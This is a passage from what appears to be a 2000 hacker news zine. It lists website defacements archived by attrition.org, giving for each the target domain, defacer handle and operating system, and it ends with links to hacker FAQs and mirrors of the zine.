Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.goldsys.org Defaced by: Keebler Elfes Operating System: Linux Defaced domain: www.conceptairsys.com Site Title: Concept Air Systems Ltd Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.conceptairsys.com Defaced by: evader Operating System: NT Potentially offensive content on defaced page. Attrition comment: Mass defacement. Same defacement: http://www.materials.building-trades.com/ Defaced domain: www.nightfalls.com Site Title: Night Falls Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.nightfalls.com Defaced by: OHB Operating System: Linux Defaced domain: www.420ville.com Site Title: DW Sales Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.420ville.com Defaced by: acidklown & xhostile Operating System: 95 Potentially offensive content on defaced page. Defaced domain: mmspubden.mms.gov Site Title: MMS Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/mmspubden.mms.gov Defaced by: NET ILLUSION Operating System: NT Defaced domain: www.lutherancentraldist.org Site Title: Lutheran Church-Canada, Central District Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.lutherancentraldist.org Defaced by: acid klown Operating System: 95 Potentially offensive content on defaced page. Attrition comment: Free Kevin HREFs embedded in page Defaced domain: www.info-mgmt.com Site Title: Information Management Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.info-mgmt.com Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/3.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.virtualtk.com Site Title: Virtual Technologies Inc. 
Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.virtualtk.com Defaced by: w0lf Operating System: Irix Defaced domain: gtanet.region.halton.on.ca Site Title: GTA Network Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/gtanet.region.halton.on.ca Defaced by: Algorithm Cracker Operating System: Windows NT HIDDEN comments in the HTML. Defaced domain: www.ond.vlaanderen.be Site Title: Ministerie van de Vlaamse Gemeenschap Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.ond.vlaanderen.be Defaced by: Indig00 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.chamber.etobicoke.on.ca Site Title: Etobicoke Chamber of Commerce Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.chamber.etobicoke.on.ca Defaced by: Algorithm Hacker Operating System: Windows NT HIDDEN comments in the HTML. Defaced domain: www.worldevangelical.org Site Title: World Evangelical Fellowship Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.worldevangelical.org Defaced by: Ass0mbracao Operating System: Linux Previously defaced on 99.12.18 99.12.19 by Analognet Fuby Potentially offensive content on defaced page. Defaced domain: www.bcmhs.bc.ca Site Title: Riverview Hospital Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.bcmhs.bc.ca Defaced by: Algorithm Cracker Operating System: Windows 95 HIDDEN comments in the HTML. 
Defaced domain: citx.com Site Title: Computer Innovations of Texas Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/citx.com Defaced by: z3d Operating System: Solaris Defaced domain: bamfield.sd70.bc.ca Site Title: Bamfield Community Access Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/bamfield.sd70.bc.ca Defaced by: Algorithm Cracker Operating System: Windows NT Defaced domain: www.oct.on.ca Site Title: Ontario College of Teachers Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.oct.on.ca Defaced by: Algorithm Cracker Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: gtanet.region.halton.on.ca Site Title: GTA Network Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/gtanet.region.halton.on.ca Defaced by: unknown Operating System: Windows NT HIDDEN comments in the HTML. Attrition comment: This is a redefacement commenting on Algorithm Cracker referring to all Canadian admins as "lame" Defaced domain: www.slak.net Site Title: Slaknet Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.slak.net Defaced by: dhc Operating System: Linux (Apache 1.3.9) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.eud.dk Site Title: Eu-Direktoratet Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.eud.dk Defaced by: da dragon Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: smtpmta.aim.edu Site Title: Asian Institute of Management Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/smtpmta.aim.edu Defaced by: comdak Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.homeport.bc.ca Site Title: Bazan Bay o/a HomePort Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.homeport.bc.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. 
Potentially offensive content on defaced page. Defaced domain: smtpmta.aim.edu Site Title: Asian Institute of management Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/smtpmta.aim.edu Defaced by: chickie Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.smus.bc.ca Site Title: St. Michaels University School Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.smus.bc.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.) Potentially offensive content on defaced page. Defaced domain: www.swim.bc.ca Site Title: Swim B.C. Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.swim.bc.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: lab1.chem.queensu.ca Site Title: Queen University's Chemistry Laboratory Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/lab1.chem.queensu.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.tltc.shu.edu Site Title: Seton Hall University Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.tltc.shu.edu Defaced by: algorithm cracker Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.law.ubc.ca Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.law.ubc.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cio.usmc.mil Site Title: US Marine Corps Chief Information Officer Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.cio.usmc.mil Defaced by: hV2k Operating System: NT Defaced domain: www.doe-md.gov Site Title: Dept. 
of Energy Miamisburg Environmental Management Project Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.doe-md.gov Defaced by: hV2k Operating System: NT Defaced domain: www.hcfa.gov Site Title: Health Care Financing Administration Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.hcfa.gov Defaced by: hV2k Operating System: NT Defaced domain: www.ecr.gov Site Title: US Institute For Environmental Conflict Resolution Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.ecr.gov Defaced by: Powr Operating System: Linux HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.highlevelalarms.com Site Title: High Level Alarms Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.highlevelalarms.com Defaced by: Political Genocide Operating System: Digital Unix Potentially offensive content on defaced page. Defaced domain: www.cosmicdust.com Site Title: Dennis Kerrigan Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.cosmicdust.com Defaced by: Evader Operating System: Windows NT (WebSitePro/2.4.9) Potentially offensive content on defaced page. Defaced domain: sshs.pcclub.org Site Title: Santa Susana High School PC Club Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/sshs.pcclub.org Defaced by: DeniaL Operating System: SuSE Linux Defaced domain: www.computicket.co.za Site Title: CompuTicket Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.computicket.co.za Defaced by: aKt0r Operating System: Windows NT Defaced domain: www.msiimaging.com Site Title: Microfilming Services, Inc. 
Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.msiimaging.com Defaced by: Uneek Tech Operating System: Linux Previously defaced on 99.10.07 by Narr0w Potentially offensive content on defaced page. Defaced domain: eec.psu.edu Site Title: Leonhard Center for the Enhancement of Engineering Education at Penn State Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/eec.psu.edu Defaced by: herf Operating System: Windows NT Defaced domain: www.pranky.com Site Title: United Phreaks Syndicate Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.pranky.com Defaced by: wkD Operating System: Linux Defaced domain: www.ndn.co.jp Site Title: Nippon Data Net Limited Partnership Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.ndn.co.jp Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 5 times by Potentially offensive content on defaced page. Defaced domain: www.infoctr.edu Site Title: Library of International Relations Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.infoctr.edu Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.23 by thesaint666 Potentially offensive content on defaced page. Defaced domain: www.mysticvalleyrealty.com Site Title: Mystic Valley Real Estate Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.mysticvalleyrealty.com Defaced by: OHB Operating System: Windows NT (WebSitePro/2.3.15) Potentially offensive content on defaced page. Defaced domain: www.systemsontime.com Site Title: Systems On Time Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.systemsontime.com Defaced by: auto36047@hushmail.com Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. 
Defaced domain: www.fashion.com.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.fashion.com.br Defaced by: _COBAIA_AND_VIBORA_ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.rmsd.com Site Title: Rocky Mountain Systems Design Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.rmsd.com Defaced by: POTS Operating System: Linux (Apache 1.2.5) Potentially offensive content on defaced page. Defaced domain: www.technowolf.com Site Title: Technowolf Web Design Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.technowolf.com Defaced by: auto36047@hushmail.com Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.thephatmall.com Site Title: Antwone Walters Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.thephatmall.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.gayheaven.net Site Title: Andreas Bolin Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.gayheaven.net Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.fun-police.com Site Title: Chad Reese Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.fun-police.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.yourwebhome.com Site Title: Graficom Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.yourwebhome.com Defaced by: HiP Operating System: Debian Linux Potentially offensive content on defaced page. Defaced domain: www.assespro.org.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.assespro.org.br Defaced by: Aresnations Team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. 
Defaced domain: www.troop79.org Site Title: Boy Scouts of America - Troop 79 Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.troop79.org Defaced by: Team Echo Operating System: Solaris 2.6 - 2.7 Potentially offensive content on defaced page. Defaced domain: www.domainowners.com Site Title: 980 E 18 Street Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.domainowners.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.dvdweddings.com Site Title: Pacific Video Image Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.dvdweddings.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.e3.com Site Title: E3 Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.e3.com Defaced by: Carte Blanche Operating System: Windows NT (IIS/4.)) Potentially offensive content on defaced page. Defaced domain: www.Girlscoutstotem.org Site Title: Girl Scouts - Totem Council Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.Girlscoutstotem.org Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.samilchurch.com Site Title: Samil Church Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.samilchurch.com Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.independentbaptist.net Site Title: Freedom Baptist Temple Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.independentbaptist.net Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.mgaa.com Site Title: Minority Golf Association of America Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.mgaa.com Defaced by: Team Echo Operating System: Linux Potentially offensive content on defaced page. 
Defaced domain: www.ozarkad.com Site Title: Ozark Advertising and Communications Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.ozarkad.com Defaced by: BlazinWeed Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.intense-city.net Site Title: CHS Enterprises Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.intense-city.net Defaced by: BlazinWeed Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.brabant.nl Site Title: Provinciehuis Brabant Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.brabant.nl Defaced by: Scrippie Operating System: WinNT Defaced domain: www.flysaturn.com Site Title: Saturn Computer Sevices Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.flysaturn.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.idgames.com Site Title: Idiot Games Inc Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.idgames.com Defaced by: Debian Operating System: FreeBSD Defaced domain: www.myweb-site.com Site Title: My Web Site Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.myweb-site.com Defaced by: Secto0r Operating System: Linux Defaced domain: www.your-name-here.co.uk Site Title: Your Name Here Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.your-name-here.co.uk Defaced by: Secto0r Operating System: Linux Potentially offensive content on defaced page. 
Defaced domain: www.richmond.com.ar
Site Title: Richmond Publishing Argentina
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.richmond.com.ar
Defaced by: Team Echo
Operating System: Windows NT

Defaced domain: www.samilchurch.com
Site Title: Samil Church
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.samilchurch.com
Operating System: Linux

Defaced domain: www.computereveryone.com
Site Title: Computer Everyone
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.computereveryone.com
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.capitolareanetworks.com
Site Title: Capitol Area Networks
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.capitolareanetworks.com
Defaced by: hV2k
Operating System: Windows NT

Defaced domain: www.securityseekers.com
Site Title: Security Seekers
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.securityseekers.com
Defaced by: Morbid Angel
Operating System: Linux

Defaced domain: www.gayheaven.net
Site Title: Gay Heaven
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.gayheaven.net
Defaced by: mattchew
Operating System: Linux

Defaced domain: www.adrica.com
Site Title: Adrica
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.adrica.com
Defaced by: mattchew
Operating System: Linux

Defaced domain: www.badjura-petri.com
Site Title: Badjura und Petri Hoch
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com
Defaced by: stealth
Operating System: Windows NT
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.
Defaced domain: www.ahost4u.com
Site Title: A Host for You
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.ahost4u.com
Defaced by: secto0r
Operating System: Linux

Defaced domain: www.search-party.com
Site Title: Search Party
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.search-party.com
Defaced by: DHC
Operating System: Solaris

Defaced domain: www.brisolla.com.br
Site Title: Brisolla
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.brisolla.com.br
Defaced by: Death Corporation
Operating System: Windows NT

Defaced domain: www.assespro.org.br
Site Title: Asses Pro Brazil
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.assespro.org.br
Defaced by: OHB
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.fetishfish.com
Site Title: Fetish Fish
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.fetishfish.com
Defaced by: mattchew
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.online-manual.com
Site Title: Online Manual
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.online-manual.com
Defaced by: secto0r
Operating System: Linux

Defaced domain: www.swim.bc.ca
Site Title: Swim B.C.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.swim.bc.ca
Defaced by: OHB
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.smus.bc.ca
Site Title: St. Michaels University School
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.smus.bc.ca
Defaced by: OHB
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: lazylizard.net
Site Title: LazyLizard Internet
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/lazylizard.net
Defaced by: Blazinweed
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.dunnavan.com
Site Title: C.C. Dunnavan & Co
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.dunnavan.com
Defaced by: Ass0mbracao
Operating System: Windows NT

Defaced domain: zeus.logical.it
Site Title: Logical Instruments S.N.C.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/zeus.logical.it
Defaced by: k5 krew
Operating System: Windows NT

Defaced domain: www.verdonk.net
Site Title: Verdonk
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.verdonk.net
Defaced by: Blazinweed
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.motorscan.com
Site Title: Motorscan
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.motorscan.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: www.ultramagnetic.com
Site Title: Ultra Magnetic
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.ultramagnetic.com
Defaced by: auto36047
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.jse.co.za
Site Title: Johannesburg Stock Exchange
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.jse.co.za
Defaced by: aKt0r
Operating System: Windows NT
Attrition comment: Allegedly the equivalent of Nasdaq for South Africa

Defaced domain: www.yuuki.com
Site Title: Yuuki Hashimoto
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.yuuki.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: hazmatstorage.com
Site Title: Hazmat Storage Containers
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/hazmatstorage.com
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.slawek.com
Site Title: SH Enterprises
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.slawek.com
Defaced by: Blazinweed
Operating System: Linux
Potentially offensive content on defaced page.
Defaced domain: www.wwh.net
Site Title: Web World Hosting
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.wwh.net
Defaced by: Sodium
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.ubaldi.org
Site Title: Movimento Civilta Parmigiana
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.ubaldi.org
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.hiroshi.com
Site Title: Hiroshi Sakai
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.hiroshi.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: www.galtech.com
Site Title: Gal Tech
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.galtech.com
Defaced by: Blazinweed
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: aee.hq.faa.gov
Site Title: FAA Office of Environment and Energy
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/aee.hq.faa.gov
Defaced by: hyrax
Operating System: Windows NT
FREE KEVIN reference in the HTML
HIDDEN comments in the HTML.

Defaced domain: www.stilex.com.br
Site Title: Stilex Brazil
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.stilex.com.br
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.tevi.com
Site Title: Tele vision Gmbh
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.tevi.com
Defaced by: DHC
Operating System: BSDI

Defaced domain: www.fibblesnork.com
Site Title: Fibblesnork Productions
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.fibblesnork.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: www.esperidi.org
Site Title: Edizioni Blu
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.esperidi.org
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.
Defaced domain: www.gabinetedaimagem.com.br
Site Title: Gabinet da imagem
Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.gabinetedaimagem.com.br
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.anti-mail.com
Site Title: Anti-Mail
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.anti-mail.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: www.tesnet.net
Site Title: TesNet
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.tesnet.net
Defaced by: secto0r
Operating System: Linux

Defaced domain: www.inferno-piercing.com
Site Title: Inferno Piercing
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.inferno-piercing.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: www.jasonhill.com
Site Title: Jason Hill's Web site
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.jasonhill.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: www.anti-boards.com
Site Title: Anti-Boards
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.anti-boards.com
Defaced by: kryptek

Defaced domain: www.kaizenstudios.com
Site Title: Kaizen Studios
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.kaizenstudios.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: www.philadelphiaexperiment.com
Site Title: Philadelphia Eperiment
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.philadelphiaexperiment.com
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.
Defaced domain: www.lazymice.com
Site Title: Lazy Mice
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.lazymice.com
Defaced by: kryptek
Operating System: Solaris

Defaced domain: www.sportslinc.com
Site Title: Sports Linc
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.sportslinc.com
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.skatenerd.com
Site Title: Skate Nerd
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.skatenerd.com
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.networktimes.co.za
Site Title: Network Times S.A.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.networktimes.co.za
Defaced by: aKt0r
Operating System: Windows NT

Defaced domain: www.cool.com
Site Title: Cool.com
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.cool.com
Defaced by: fuqrag
Operating System: Windows NT
Attrition comment: It appears that fuqrag is back

Defaced domain: www.chosen.co.za
Site Title: Chosen South Africa
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.chosen.co.za
Defaced by: Uneek Tech
Operating System: Linux
Potentially offensive content on defaced page.
Defaced domain: qaru.ars.usda.gov
Site Title: Department of Agriculture
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/qaru.ars.usda.gov
Defaced by: hyrax
Operating System: Irix

Defaced domain: www.europe.dla.mil
Site Title: Defense Logistics Agency
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.europe.dla.mil
Defaced by: hyrax
Operating System: NT

Defaced domain: geomag.usgs.gov
Site Title: United States Geological Survey
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/geomag.usgs.gov
Defaced by: hyrax
Operating System: NT

Defaced domain: www.nsgass.navy.mil
Site Title: Navy
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.nsgass.navy.mil
Defaced by: hyrax
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: lej-www.med.navy.mil
Site Title: Navy
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/lej-www.med.navy.mil
Defaced by: hyrax
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: environ.nosc.mil
Site Title: Naval Ocean Systems Center
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/environ.nosc.mil
Defaced by: hyrax
Operating System: NT

Defaced domain: www.dsa.ca.gov
Site Title: State of California
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.dsa.ca.gov
Defaced by: hyrax
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: www.ahahealth.com
Site Title: American Homeowners Association
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.ahahealth.com
Defaced by: kryptek
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.Kuwait-airport.com.kw
Site Title: Kuwait Airport
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.Kuwait-airport.com.kw
Defaced by: Team Echo
Operating System: NT
Potentially offensive content on defaced page.
Defaced domain: pirs.mvr.usace.army.mil
Site Title: ARMY SIGNAL COMMAND
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/pirs.mvr.usace.army.mil
Defaced by: hyrax
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: www.euresys.be
Site Title: Euresys Corporation
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.euresys.be
Defaced by: hyrax
Operating System: Windows NT

Defaced domain: www.thepeopleswwf.com
Site Title: The People
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.thepeopleswwf.com
Operating System: Linux
FREE KEVIN reference in the HTML
Potentially offensive content on defaced page.

Defaced domain: www.plusmail.com
Site Title: Plus Mail
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.plusmail.com
Defaced by: Morbid Angel
Operating System: Linux

Defaced domain: www.clearwater.dcmde.dla.mil
Site Title: Defense Contract Management District East (Clearwater Florida Office)
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.clearwater.dcmde.dla.mil
Defaced by: hyrax
Operating System: Windows NT

Defaced domain: fla.esf.edu
Site Title: Faculty of Landscape Architecture, SUNY College of Environmental Science and Forestry
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/fla.esf.edu
Defaced by: hyrax
Operating System: Windows NT

Defaced domain: magis.creighton.edu
Site Title: Creighton University MAGIS server
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/magis.creighton.edu
Defaced by: hyrax
Operating System: Windows NT

Defaced domain: indepstudy.ext.missouri.edu
Site Title: Center for Independent Study at the University of Missouri
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/indepstudy.ext.missouri.edu
Defaced by: hyrax
Operating System: Windows NT

Defaced domain: www.tyte-online.com
Site Title: Tyte Online
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.tyte-online.com
Operating System: Linux
FREE KEVIN reference in the HTML

Defaced domain: www.cisupport.com
Site Title: CI Host
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.cisupport.com
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.getrealproductions.com
Site Title: Get Real Productions
Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.getrealproductions.com
Defaced by: Blazin Weed
Potentially offensive content on defaced page.

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
